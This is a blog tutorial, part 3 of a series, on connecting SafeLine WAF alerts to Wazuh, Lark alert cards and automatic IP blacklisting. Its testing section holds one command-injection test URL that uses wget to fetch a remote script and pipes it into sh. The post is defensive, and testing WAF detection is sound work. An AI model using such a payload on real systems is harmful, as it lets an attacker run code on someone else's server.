Integrating Open Source WAF with Wazuh (Part 3)

Carrie - Oct 12 - - Dev Community

This article is written by a SafeLine WAF user, 曼联小胖子

Part 1 is here.
Part 2 is here.

Wazuh Agent Configuration

  1. Log in to the Safeline WAF server and configure ossec to monitor the waf_alert.log file:
vim /var/ossec/etc/ossec.conf

Add the following configuration:

<localfile>
    <log_format>syslog</log_format>
    <location>/var/log/waf_alert/waf_alert.log</location>
</localfile>
Enter fullscreen mode Exit fullscreen mode

It should be like the image below.

Image description

  1. Restart Wazuh Agent to Apply Configuration
systemctl restart wazuh-agent
Enter fullscreen mode Exit fullscreen mode

Testing the Setup

Conduct a vulnerability scan on the website or input attack test statements to trigger alerts and check the interception results. For example:

https://a.test.com/view.php?doc=11.jpg&format=swf&isSplit=true&page=||wget http://spotslfy.com/wget.sh -O-|sh

Lark Alert Card

The Lark alert card will display clear messages that all relevant personnel in the group can see.

Image description

Safeline WAF IP Blacklist

You can see the attacking source IP, such as 47.1.1.1, automatically added to the blacklist.

Image description

When the attacker tries to access the website again, they will be blocked.

Image description

Checking the Number of Blacklisted IPs

To count the total number of blacklisted IPs, check the log:

cat /var/log/waf/block_ip.log
Enter fullscreen mode Exit fullscreen mode

Image description

Further Ideas

Due to limited personal resources, there are two additional ideas regarding Lark alerts that I haven’t implemented. If you’re interested and have the development skills, feel free to explore further:

  1. Avoiding False IP Bans: To avoid mistakenly banning IPs, you could add two interactive buttons to the Feishu card message: “Confirm IP Ban” and “Ignore.” Clicking “Confirm IP Ban” would trigger the IP ban and simultaneously send a notification to the group with the handling result.

2.Alert Data Analysis: Currently, alert information pushed to the Feishu group cannot be statistically analyzed. Feishu multi-dimensional tables have basic Excel capabilities and powerful automation processes. With well-designed table fields, automation configurations, and API development, it can serve as a low-cost security data center and SOAR. For example, it could periodically push security weekly reports to the Feishu security workgroup, periodically summarize malicious IP lists, and push them to security devices.

That's the end.

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .